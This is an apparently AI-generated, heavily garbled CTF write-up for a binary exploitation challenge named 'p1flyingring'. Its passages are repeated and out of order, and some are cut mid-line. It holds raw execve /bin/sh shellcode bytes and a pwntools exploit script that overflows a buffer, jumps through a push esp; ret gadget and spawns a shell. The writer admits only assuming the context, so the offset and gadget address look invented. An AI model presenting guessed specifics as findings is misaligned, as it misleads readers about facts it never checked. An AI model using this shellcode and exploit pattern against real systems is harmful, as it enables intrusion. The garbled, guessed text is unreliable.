P1flyingring | 720p |

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 [ padding 0x44 ] [ push_esp_ret_addr ] [ nop sled + shellcode ] 5. Exploit script (Python) #!/usr/bin/env python3 from pwn import * p = process('./p1flyingring') p = remote('target', port) offset = 0x44 push_esp_ret = 0x0804858a

p.send(payload) p.interactive()

Here’s a write-up for the challenge, assuming it’s a CTF/pwn challenge (common on platforms like pwnable.tw or similar). If you meant a different context (e.g., reversing, web), let me know. p1flyingring – Write-up Challenge Overview p1flyingring is a binary exploitation challenge. The name hints at a “flying ring” (possibly a pun on Feng Ring or buffer overflow). The binary is a 32-bit ELF with minimal protections. p1flyingring

shellcode = asm(shellcraft.i386.sh()) payload = b'A' * offset payload += p32(push_esp_ret) payload += b'\x90' * 16 # nop sled payload += shellcode

$ ROPgadget --binary p1flyingring | grep "push esp" 0x0804858a : push esp ; ret Address: 0x0804858a . 32-bit execve shellcode (25 bytes): shellcode = asm(shellcraft

Checking security:

$ cyclic 100 $ run < pattern Offset = 0x44 (68 bytes). objdump -d p1flyingring | grep "jmp esp" → none in binary. Check libc or use push esp; ret : Check libc or use push esp

Run → get shell. After exploitation:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 [ padding 0x44 ] [ push_esp_ret_addr ] [ nop sled + shellcode ] 5. Exploit script (Python) #!/usr/bin/env python3 from pwn import * p = process('./p1flyingring') p = remote('target', port) offset = 0x44 push_esp_ret = 0x0804858a

p.send(payload) p.interactive()

Here’s a write-up for the challenge, assuming it’s a CTF/pwn challenge (common on platforms like pwnable.tw or similar). If you meant a different context (e.g., reversing, web), let me know. p1flyingring – Write-up Challenge Overview p1flyingring is a binary exploitation challenge. The name hints at a “flying ring” (possibly a pun on Feng Ring or buffer overflow). The binary is a 32-bit ELF with minimal protections.

shellcode = asm(shellcraft.i386.sh()) payload = b'A' * offset payload += p32(push_esp_ret) payload += b'\x90' * 16 # nop sled payload += shellcode

$ ROPgadget --binary p1flyingring | grep "push esp" 0x0804858a : push esp ; ret Address: 0x0804858a . 32-bit execve shellcode (25 bytes):

Checking security:

$ cyclic 100 $ run < pattern Offset = 0x44 (68 bytes). objdump -d p1flyingring | grep "jmp esp" → none in binary. Check libc or use push esp; ret :

Run → get shell. After exploitation: